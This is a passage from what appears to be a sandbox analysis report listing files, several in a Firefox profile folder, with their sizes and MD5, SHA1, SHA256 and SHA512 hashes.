SHA16db01e9dc9ede9ff27d57e9849bbec7201811742
SHA256e2ae5833da1c7245f5dc80ffd1c4bddb48be51afc49559aa45ce063854fec10c
SHA51295eea65f7bb3c4e6d905fe716a5339a0264bf20ce7d4ea291181982f55471ae47273c556104faab07bd0080695634a096c628bb5238eb154c0911e328ec2d888
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.1MB
MD588345910e7756216c80bf4046952980b
SHA1f508e862e3d2b48a83dfa064d4655035953482c0
SHA256c9b511ede4963bc4ce43425a950014c7b4fedde81add8febb049359e2d3e4704
SHA512a53f0242ae77be006bf9d22b42764de414f94e98dd5eb716db5d7286555826a3317a80a00c0c2448ad836c16181168c5f77da954cc29978f1d023bac42d28845
-
Filesize
726B
MD5a881ea9c89c5263182febcd481b8c982
SHA1907e98c728ab0b8fb520932e1396dbb403c121a3
SHA256143c40ac8da66363965bc7eb257e1ce907438be30d8e01775327220509169958
SHA51209bf21c9da9408d3e089e26b311fd69e5ee325469db30499cc871e8d6f71eba6e3fa3970dc75b9ca93b370675f4bb5da60099c5fbf09d8040e30ac6735c6427a
-
Filesize
4.1MB
MD5f1abe4f549ebdf621c51ee73a35d548a
SHA12e98814bf5f0b37380a210278b12b24bb262433f
SHA2562d10c308f8eb83b56d8491f593dcf492e6a57ddfc66ee285212cfa70482563bd
SHA512da6460bbad6e52f1b81f344397a964512a576d08d7623c1476ec3b7e749a4446117f86c7918bcf45ae42107717aac6a697cb0709da8bee53a7b35abb7d26411b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\AlternateServices.bin
Filesize13KB
MD521d1424f9b668741a2e712b3467ced6d
SHA1f17b219d87e79fc31c53a61c2d23cdeb48625b3d
SHA256e37f1d4c876be788926f702d8513eea27b5afc2ce72c67f178468187cb59ea08
SHA512de69cedb7eef453d3d3540c2aab8c6cae731ca68a7e4a265238ea2232e37397de3c241640b14cadfde6712cbec04b30aacd4b9d31ba6955f4949b391cefa36e0
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\AlternateServices.bin
Filesize8KB
MD53a419a09ff1eebbb23ea498ce37455ea
SHA1b55d6621ee585b2ce197017837ac5b887cde5b07
SHA256e6fa5d33233ff74b73be43a0bd4d5bcca8d7e3fe92a2edc528b41c2486e51bbe
SHA512121f1eced0c2fe680db0d3f2a6b045499bfac0f7de69fb8ca35fc7836e5dd5a0448d4f5a2a58868f97dc7864794502a8647d635e3290ff1fb308b22ffd34cdb1
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5391e01518d7a30b2d27c5b6ce74e27a9
SHA1f27597f1b32a3db949594a18bcfd3cbe986862a9
SHA256d6f195abfc55c2acb51c8f8cce3ba2a7af43ca49198b3a6685cee8444647e0b6
SHA5126ab30fabaf7a92c7e2e7814a63ee969c4b1f230a9630597f210c9887c1e8ceae9a0c04dd7c1a03d89927acaa3d0ccbe70979894e17086efca161ec9f7395ac66
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD536bc9d96a72b92f60cf462ca7d80c0d9
SHA16b65d7fd0ee2b70dd80af24d4d00b3ff5987dbe6
SHA256a1cc45b1436eb373bdb357481123b46b66178fe6d741c7b5ba6680e87fad3a00
SHA512eea2012e1a23d89fb3fc8e368ab2fbd81b304b2cddb95c91b1860227ac92d05a48f353525f6dbf248e0c38278f1ec1c17ac293bdcffd2979d860c39e1c65e5dd
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\3c81cffd-dc26-4016-b22d-cc2b276d080e
Filesize27KB
MD5c922d31ad7d9816b0db0937b34e64bea
SHA1b07c62c70008794b32a19e494134aac301ba1586
SHA256a2aacc74069cde106606d79940de7b851bf7a6433732da09892cbe665fc1dcae
SHA512cf6bf3f231d898758d2aa981ec11dfb27105ed9adadeaf500046a27b231de4610a17e6c8164ea29d01c64756c7e6027c84fb4abb2e685278406e11a76cbc591c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\4c162a21-73fc-42f6-866e-fe8e1836b1fb
Filesize671B
MD56d84362525481edfbdb6900d5becad72
SHA154980521e8cb003bcba5f5ca9349cefa1e96739b
SHA256b4acf1ea9ac8b25b13b0ebdbfd7a951d9730342b8a23cf93174b455eb14aedef
SHA51224205bc18318a47889df842945f7b483e40181e6d70c93394b55be1ca94a004aad4b312bd13f4ca80d0be8a8fe8f7d2cfef50351fd58bce71920610a5dd26eeb
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\f378871a-4a9f-4340-9585-4a785a6ef04a
Filesize982B
MD595e2d4d0e084c70d0b0126bdb34a74fe
SHA1561212743bea5ed0e3d053b4bf62e9b8adc1b19d
SHA256eb60a230b310b8e87052bdf59362b770f283fe98b27d7ef5cf88f24d54fc6938
SHA5123f646680fb5454b6cad5b02873e65d3a172d936a68fe841035378c950a5fc75ac31b99be4b34f95155aa574bea736d82331ad5acf77b36000bc3665f0158937b
-
Filesize
9KB
MD585a9a19e256d0c18860ca22b49cbf668
SHA1657bd3efa2d97df4a253c70652bd81f28e5820d6
SHA2560b37cad1328d3b8a08c86727316150467a71d06799ccc54ef6acb1920fbcc62d
SHA512f0690790473982629433e2a91024082de123d6593b0448bb62a65d09569cf02ff36eee3ee1384c50bc42fcebc0f40c019196a3fc724eb9a378537f625f2fa23b
-
Filesize
9KB
MD5708f5aa8871992ef03ef657ec25cecb2
SHA12e7f5927a252f3fc239fe80e0ad7e439088e08a9
SHA256a5070bef7713fd958812031c3e9de5f59cfcecb2f1f6d4e41ca4fd533bbfab47
SHA5129f2b680a545a356160854d329bd34a9c2514cd9c0dacc730a47a5739b9b72f2654adc1bd53038ad2ad2434121d0e5b6b3d9c6a09f0d5f41fba088f8d50d2d404